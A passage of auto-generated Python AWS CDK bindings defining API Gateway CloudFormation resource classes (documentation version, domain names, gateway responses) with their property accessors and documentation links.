class CfnDocumentationVersion(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnDocumentationVersion"):
"""A CloudFormation ``AWS::ApiGateway::DocumentationVersion``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationversion.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::DocumentationVersion
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, documentation_version: str, rest_api_id: str, description: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGateway::DocumentationVersion``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param documentation_version: ``AWS::ApiGateway::DocumentationVersion.DocumentationVersion``.
:param rest_api_id: ``AWS::ApiGateway::DocumentationVersion.RestApiId``.
:param description: ``AWS::ApiGateway::DocumentationVersion.Description``.
"""
props = CfnDocumentationVersionProps(documentation_version=documentation_version, rest_api_id=rest_api_id, description=description)
jsii.create(CfnDocumentationVersion, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="documentationVersion")
def documentation_version(self) -> str:
"""``AWS::ApiGateway::DocumentationVersion.DocumentationVersion``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationversion.html#cfn-apigateway-documentationversion-documentationversion
"""
return jsii.get(self, "documentationVersion")
@documentation_version.setter
def documentation_version(self, value: str):
return jsii.set(self, "documentationVersion", value)
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::DocumentationVersion.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationversion.html#cfn-apigateway-documentationversion-restapiid
"""
return jsii.get(self, "restApiId")
@rest_api_id.setter
def rest_api_id(self, value: str):
return jsii.set(self, "restApiId", value)
@property
@jsii.member(jsii_name="description")
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::DocumentationVersion.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationversion.html#cfn-apigateway-documentationversion-description
"""
return jsii.get(self, "description")
@description.setter
def description(self, value: typing.Optional[str]):
return jsii.set(self, "description", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDocumentationVersionProps", jsii_struct_bases=[], name_mapping={'documentation_version': 'documentationVersion', 'rest_api_id': 'restApiId', 'description': 'description'})
class CfnDocumentationVersionProps():
def __init__(self, *, documentation_version: str, rest_api_id: str, description: typing.Optional[str]=None):
"""Properties for defining a ``AWS::ApiGateway::DocumentationVersion``.
:param documentation_version: ``AWS::ApiGateway::DocumentationVersion.DocumentationVersion``.
:param rest_api_id: ``AWS::ApiGateway::DocumentationVersion.RestApiId``.
:param description: ``AWS::ApiGateway::DocumentationVersion.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationversion.html
"""
self._values = {
'documentation_version': documentation_version,
'rest_api_id': rest_api_id,
}
if description is not None: self._values["description"] = description
@property
def documentation_version(self) -> str:
"""``AWS::ApiGateway::DocumentationVersion.DocumentationVersion``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationversion.html#cfn-apigateway-documentationversion-documentationversion
"""
return self._values.get('documentation_version')
@property
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::DocumentationVersion.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationversion.html#cfn-apigateway-documentationversion-restapiid
"""
return self._values.get('rest_api_id')
@property
def description(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::DocumentationVersion.Description``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-documentationversion.html#cfn-apigateway-documentationversion-description
"""
return self._values.get('description')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnDocumentationVersionProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnDomainName(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnDomainName"):
"""A CloudFormation ``AWS::ApiGateway::DomainName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::DomainName
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, domain_name: str, certificate_arn: typing.Optional[str]=None, endpoint_configuration: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["EndpointConfigurationProperty"]]]=None, regional_certificate_arn: typing.Optional[str]=None, security_policy: typing.Optional[str]=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None) -> None:
"""Create a new ``AWS::ApiGateway::DomainName``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param domain_name: ``AWS::ApiGateway::DomainName.DomainName``.
:param certificate_arn: ``AWS::ApiGateway::DomainName.CertificateArn``.
:param endpoint_configuration: ``AWS::ApiGateway::DomainName.EndpointConfiguration``.
:param regional_certificate_arn: ``AWS::ApiGateway::DomainName.RegionalCertificateArn``.
:param security_policy: ``AWS::ApiGateway::DomainName.SecurityPolicy``.
:param tags: ``AWS::ApiGateway::DomainName.Tags``.
"""
props = CfnDomainNameProps(domain_name=domain_name, certificate_arn=certificate_arn, endpoint_configuration=endpoint_configuration, regional_certificate_arn=regional_certificate_arn, security_policy=security_policy, tags=tags)
jsii.create(CfnDomainName, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="attrDistributionDomainName")
def attr_distribution_domain_name(self) -> str:
"""
cloudformationAttribute:
:cloudformationAttribute:: DistributionDomainName
"""
return jsii.get(self, "attrDistributionDomainName")
@property
@jsii.member(jsii_name="attrDistributionHostedZoneId")
def attr_distribution_hosted_zone_id(self) -> str:
"""
cloudformationAttribute:
:cloudformationAttribute:: DistributionHostedZoneId
"""
return jsii.get(self, "attrDistributionHostedZoneId")
@property
@jsii.member(jsii_name="attrRegionalDomainName")
def attr_regional_domain_name(self) -> str:
"""
cloudformationAttribute:
:cloudformationAttribute:: RegionalDomainName
"""
return jsii.get(self, "attrRegionalDomainName")
@property
@jsii.member(jsii_name="attrRegionalHostedZoneId")
def attr_regional_hosted_zone_id(self) -> str:
"""
cloudformationAttribute:
:cloudformationAttribute:: RegionalHostedZoneId
"""
return jsii.get(self, "attrRegionalHostedZoneId")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="tags")
def tags(self) -> aws_cdk.core.TagManager:
"""``AWS::ApiGateway::DomainName.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html#cfn-apigateway-domainname-tags
"""
return jsii.get(self, "tags")
@property
@jsii.member(jsii_name="domainName")
def domain_name(self) -> str:
"""``AWS::ApiGateway::DomainName.DomainName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html#cfn-apigateway-domainname-domainname
"""
return jsii.get(self, "domainName")
@domain_name.setter
def domain_name(self, value: str):
return jsii.set(self, "domainName", value)
@property
@jsii.member(jsii_name="certificateArn")
def certificate_arn(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::DomainName.CertificateArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html#cfn-apigateway-domainname-certificatearn
"""
return jsii.get(self, "certificateArn")
@certificate_arn.setter
def certificate_arn(self, value: typing.Optional[str]):
return jsii.set(self, "certificateArn", value)
@property
@jsii.member(jsii_name="endpointConfiguration")
def endpoint_configuration(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["EndpointConfigurationProperty"]]]:
"""``AWS::ApiGateway::DomainName.EndpointConfiguration``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html#cfn-apigateway-domainname-endpointconfiguration
"""
return jsii.get(self, "endpointConfiguration")
@endpoint_configuration.setter
def endpoint_configuration(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["EndpointConfigurationProperty"]]]):
return jsii.set(self, "endpointConfiguration", value)
@property
@jsii.member(jsii_name="regionalCertificateArn")
def regional_certificate_arn(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::DomainName.RegionalCertificateArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html#cfn-apigateway-domainname-regionalcertificatearn
"""
return jsii.get(self, "regionalCertificateArn")
@regional_certificate_arn.setter
def regional_certificate_arn(self, value: typing.Optional[str]):
return jsii.set(self, "regionalCertificateArn", value)
@property
@jsii.member(jsii_name="securityPolicy")
def security_policy(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::DomainName.SecurityPolicy``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html#cfn-apigateway-domainname-securitypolicy
"""
return jsii.get(self, "securityPolicy")
@security_policy.setter
def security_policy(self, value: typing.Optional[str]):
return jsii.set(self, "securityPolicy", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDomainName.EndpointConfigurationProperty", jsii_struct_bases=[], name_mapping={'types': 'types'})
class EndpointConfigurationProperty():
def __init__(self, *, types: typing.Optional[typing.List[str]]=None):
"""
:param types: ``CfnDomainName.EndpointConfigurationProperty.Types``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-domainname-endpointconfiguration.html
"""
self._values = {
}
if types is not None: self._values["types"] = types
@property
def types(self) -> typing.Optional[typing.List[str]]:
"""``CfnDomainName.EndpointConfigurationProperty.Types``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-domainname-endpointconfiguration.html#cfn-apigateway-domainname-endpointconfiguration-types
"""
return self._values.get('types')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'EndpointConfigurationProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDomainNameProps", jsii_struct_bases=[], name_mapping={'domain_name': 'domainName', 'certificate_arn': 'certificateArn', 'endpoint_configuration': 'endpointConfiguration', 'regional_certificate_arn': 'regionalCertificateArn', 'security_policy': 'securityPolicy', 'tags': 'tags'})
class CfnDomainNameProps():
def __init__(self, *, domain_name: str, certificate_arn: typing.Optional[str]=None, endpoint_configuration: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnDomainName.EndpointConfigurationProperty"]]]=None, regional_certificate_arn: typing.Optional[str]=None, security_policy: typing.Optional[str]=None, tags: typing.Optional[typing.List[aws_cdk.core.CfnTag]]=None):
"""Properties for defining a ``AWS::ApiGateway::DomainName``.
:param domain_name: ``AWS::ApiGateway::DomainName.DomainName``.
:param certificate_arn: ``AWS::ApiGateway::DomainName.CertificateArn``.
:param endpoint_configuration: ``AWS::ApiGateway::DomainName.EndpointConfiguration``.
:param regional_certificate_arn: ``AWS::ApiGateway::DomainName.RegionalCertificateArn``.
:param security_policy: ``AWS::ApiGateway::DomainName.SecurityPolicy``.
:param tags: ``AWS::ApiGateway::DomainName.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html
"""
self._values = {
'domain_name': domain_name,
}
if certificate_arn is not None: self._values["certificate_arn"] = certificate_arn
if endpoint_configuration is not None: self._values["endpoint_configuration"] = endpoint_configuration
if regional_certificate_arn is not None: self._values["regional_certificate_arn"] = regional_certificate_arn
if security_policy is not None: self._values["security_policy"] = security_policy
if tags is not None: self._values["tags"] = tags
@property
def domain_name(self) -> str:
"""``AWS::ApiGateway::DomainName.DomainName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html#cfn-apigateway-domainname-domainname
"""
return self._values.get('domain_name')
@property
def certificate_arn(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::DomainName.CertificateArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html#cfn-apigateway-domainname-certificatearn
"""
return self._values.get('certificate_arn')
@property
def endpoint_configuration(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional["CfnDomainName.EndpointConfigurationProperty"]]]:
"""``AWS::ApiGateway::DomainName.EndpointConfiguration``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html#cfn-apigateway-domainname-endpointconfiguration
"""
return self._values.get('endpoint_configuration')
@property
def regional_certificate_arn(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::DomainName.RegionalCertificateArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html#cfn-apigateway-domainname-regionalcertificatearn
"""
return self._values.get('regional_certificate_arn')
@property
def security_policy(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::DomainName.SecurityPolicy``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html#cfn-apigateway-domainname-securitypolicy
"""
return self._values.get('security_policy')
@property
def tags(self) -> typing.Optional[typing.List[aws_cdk.core.CfnTag]]:
"""``AWS::ApiGateway::DomainName.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-domainname.html#cfn-apigateway-domainname-tags
"""
return self._values.get('tags')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnDomainNameProps(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnDomainNameV2(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnDomainNameV2"):
"""A CloudFormation ``AWS::ApiGatewayV2::DomainName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-domainname.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGatewayV2::DomainName
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, domain_name: str, domain_name_configurations: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "DomainNameConfigurationProperty"]]]]]=None, tags: typing.Any=None) -> None:
"""Create a new ``AWS::ApiGatewayV2::DomainName``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param domain_name: ``AWS::ApiGatewayV2::DomainName.DomainName``.
:param domain_name_configurations: ``AWS::ApiGatewayV2::DomainName.DomainNameConfigurations``.
:param tags: ``AWS::ApiGatewayV2::DomainName.Tags``.
"""
props = CfnDomainNameV2Props(domain_name=domain_name, domain_name_configurations=domain_name_configurations, tags=tags)
jsii.create(CfnDomainNameV2, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="attrRegionalDomainName")
def attr_regional_domain_name(self) -> str:
"""
cloudformationAttribute:
:cloudformationAttribute:: RegionalDomainName
"""
return jsii.get(self, "attrRegionalDomainName")
@property
@jsii.member(jsii_name="attrRegionalHostedZoneId")
def attr_regional_hosted_zone_id(self) -> str:
"""
cloudformationAttribute:
:cloudformationAttribute:: RegionalHostedZoneId
"""
return jsii.get(self, "attrRegionalHostedZoneId")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="tags")
def tags(self) -> aws_cdk.core.TagManager:
"""``AWS::ApiGatewayV2::DomainName.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-domainname.html#cfn-apigatewayv2-domainname-tags
"""
return jsii.get(self, "tags")
@property
@jsii.member(jsii_name="domainName")
def domain_name(self) -> str:
"""``AWS::ApiGatewayV2::DomainName.DomainName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-domainname.html#cfn-apigatewayv2-domainname-domainname
"""
return jsii.get(self, "domainName")
@domain_name.setter
def domain_name(self, value: str):
return jsii.set(self, "domainName", value)
@property
@jsii.member(jsii_name="domainNameConfigurations")
def domain_name_configurations(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "DomainNameConfigurationProperty"]]]]]:
"""``AWS::ApiGatewayV2::DomainName.DomainNameConfigurations``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-domainname.html#cfn-apigatewayv2-domainname-domainnameconfigurations
"""
return jsii.get(self, "domainNameConfigurations")
@domain_name_configurations.setter
def domain_name_configurations(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "DomainNameConfigurationProperty"]]]]]):
return jsii.set(self, "domainNameConfigurations", value)
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDomainNameV2.DomainNameConfigurationProperty", jsii_struct_bases=[], name_mapping={'certificate_arn': 'certificateArn', 'certificate_name': 'certificateName', 'endpoint_type': 'endpointType'})
class DomainNameConfigurationProperty():
def __init__(self, *, certificate_arn: typing.Optional[str]=None, certificate_name: typing.Optional[str]=None, endpoint_type: typing.Optional[str]=None):
"""
:param certificate_arn: ``CfnDomainNameV2.DomainNameConfigurationProperty.CertificateArn``.
:param certificate_name: ``CfnDomainNameV2.DomainNameConfigurationProperty.CertificateName``.
:param endpoint_type: ``CfnDomainNameV2.DomainNameConfigurationProperty.EndpointType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-domainname-domainnameconfiguration.html
"""
self._values = {
}
if certificate_arn is not None: self._values["certificate_arn"] = certificate_arn
if certificate_name is not None: self._values["certificate_name"] = certificate_name
if endpoint_type is not None: self._values["endpoint_type"] = endpoint_type
@property
def certificate_arn(self) -> typing.Optional[str]:
"""``CfnDomainNameV2.DomainNameConfigurationProperty.CertificateArn``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-domainname-domainnameconfiguration.html#cfn-apigatewayv2-domainname-domainnameconfiguration-certificatearn
"""
return self._values.get('certificate_arn')
@property
def certificate_name(self) -> typing.Optional[str]:
"""``CfnDomainNameV2.DomainNameConfigurationProperty.CertificateName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-domainname-domainnameconfiguration.html#cfn-apigatewayv2-domainname-domainnameconfiguration-certificatename
"""
return self._values.get('certificate_name')
@property
def endpoint_type(self) -> typing.Optional[str]:
"""``CfnDomainNameV2.DomainNameConfigurationProperty.EndpointType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigatewayv2-domainname-domainnameconfiguration.html#cfn-apigatewayv2-domainname-domainnameconfiguration-endpointtype
"""
return self._values.get('endpoint_type')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'DomainNameConfigurationProperty(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.data_type(jsii_type="@aws-cdk/aws-apigateway.CfnDomainNameV2Props", jsii_struct_bases=[], name_mapping={'domain_name': 'domainName', 'domain_name_configurations': 'domainNameConfigurations', 'tags': 'tags'})
class CfnDomainNameV2Props():
def __init__(self, *, domain_name: str, domain_name_configurations: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnDomainNameV2.DomainNameConfigurationProperty"]]]]]=None, tags: typing.Any=None):
"""Properties for defining a ``AWS::ApiGatewayV2::DomainName``.
:param domain_name: ``AWS::ApiGatewayV2::DomainName.DomainName``.
:param domain_name_configurations: ``AWS::ApiGatewayV2::DomainName.DomainNameConfigurations``.
:param tags: ``AWS::ApiGatewayV2::DomainName.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-domainname.html
"""
self._values = {
'domain_name': domain_name,
}
if domain_name_configurations is not None: self._values["domain_name_configurations"] = domain_name_configurations
if tags is not None: self._values["tags"] = tags
@property
def domain_name(self) -> str:
"""``AWS::ApiGatewayV2::DomainName.DomainName``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-domainname.html#cfn-apigatewayv2-domainname-domainname
"""
return self._values.get('domain_name')
@property
def domain_name_configurations(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnDomainNameV2.DomainNameConfigurationProperty"]]]]]:
"""``AWS::ApiGatewayV2::DomainName.DomainNameConfigurations``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-domainname.html#cfn-apigatewayv2-domainname-domainnameconfigurations
"""
return self._values.get('domain_name_configurations')
@property
def tags(self) -> typing.Any:
"""``AWS::ApiGatewayV2::DomainName.Tags``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigatewayv2-domainname.html#cfn-apigatewayv2-domainname-tags
"""
return self._values.get('tags')
def __eq__(self, rhs) -> bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs) -> bool:
return not (rhs == self)
def __repr__(self) -> str:
return 'CfnDomainNameV2Props(%s)' % ', '.join(k + '=' + repr(v) for k, v in self._values.items())
@jsii.implements(aws_cdk.core.IInspectable)
class CfnGatewayResponse(aws_cdk.core.CfnResource, metaclass=jsii.JSIIMeta, jsii_type="@aws-cdk/aws-apigateway.CfnGatewayResponse"):
"""A CloudFormation ``AWS::ApiGateway::GatewayResponse``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-gatewayresponse.html
cloudformationResource:
:cloudformationResource:: AWS::ApiGateway::GatewayResponse
"""
def __init__(self, scope: aws_cdk.core.Construct, id: str, *, response_type: str, rest_api_id: str, response_parameters: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, response_templates: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]=None, status_code: typing.Optional[str]=None) -> None:
"""Create a new ``AWS::ApiGateway::GatewayResponse``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param response_type: ``AWS::ApiGateway::GatewayResponse.ResponseType``.
:param rest_api_id: ``AWS::ApiGateway::GatewayResponse.RestApiId``.
:param response_parameters: ``AWS::ApiGateway::GatewayResponse.ResponseParameters``.
:param response_templates: ``AWS::ApiGateway::GatewayResponse.ResponseTemplates``.
:param status_code: ``AWS::ApiGateway::GatewayResponse.StatusCode``.
"""
props = CfnGatewayResponseProps(response_type=response_type, rest_api_id=rest_api_id, response_parameters=response_parameters, response_templates=response_templates, status_code=status_code)
jsii.create(CfnGatewayResponse, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
"""Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
stability
:stability: experimental
"""
return jsii.invoke(self, "inspect", [inspector])
@jsii.member(jsii_name="renderProperties")
def _render_properties(self, props: typing.Mapping[str,typing.Any]) -> typing.Mapping[str,typing.Any]:
"""
:param props: -
"""
return jsii.invoke(self, "renderProperties", [props])
@classproperty
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> str:
"""The CloudFormation resource type name for this resource class."""
return jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME")
@property
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[str,typing.Any]:
return jsii.get(self, "cfnProperties")
@property
@jsii.member(jsii_name="responseType")
def response_type(self) -> str:
"""``AWS::ApiGateway::GatewayResponse.ResponseType``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-gatewayresponse.html#cfn-apigateway-gatewayresponse-responsetype
"""
return jsii.get(self, "responseType")
@response_type.setter
def response_type(self, value: str):
return jsii.set(self, "responseType", value)
@property
@jsii.member(jsii_name="restApiId")
def rest_api_id(self) -> str:
"""``AWS::ApiGateway::GatewayResponse.RestApiId``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-gatewayresponse.html#cfn-apigateway-gatewayresponse-restapiid
"""
return jsii.get(self, "restApiId")
@rest_api_id.setter
def rest_api_id(self, value: str):
return jsii.set(self, "restApiId", value)
@property
@jsii.member(jsii_name="responseParameters")
def response_parameters(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``AWS::ApiGateway::GatewayResponse.ResponseParameters``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-gatewayresponse.html#cfn-apigateway-gatewayresponse-responseparameters
"""
return jsii.get(self, "responseParameters")
@response_parameters.setter
def response_parameters(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]):
return jsii.set(self, "responseParameters", value)
@property
@jsii.member(jsii_name="responseTemplates")
def response_templates(self) -> typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]:
"""``AWS::ApiGateway::GatewayResponse.ResponseTemplates``.
see
:see: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-apigateway-gatewayresponse.html#cfn-apigateway-gatewayresponse-responsetemplates
"""
return jsii.get(self, "responseTemplates")
@response_templates.setter
def response_templates(self, value: typing.Optional[typing.Union[typing.Optional[aws_cdk.core.IResolvable], typing.Optional[typing.Mapping[str,str]]]]):
return jsii.set(self, "responseTemplates", value)
@property
@jsii.member(jsii_name="statusCode")
def status_code(self) -> typing.Optional[str]:
"""``AWS::ApiGateway::GatewayResponse.StatusCode``.
see
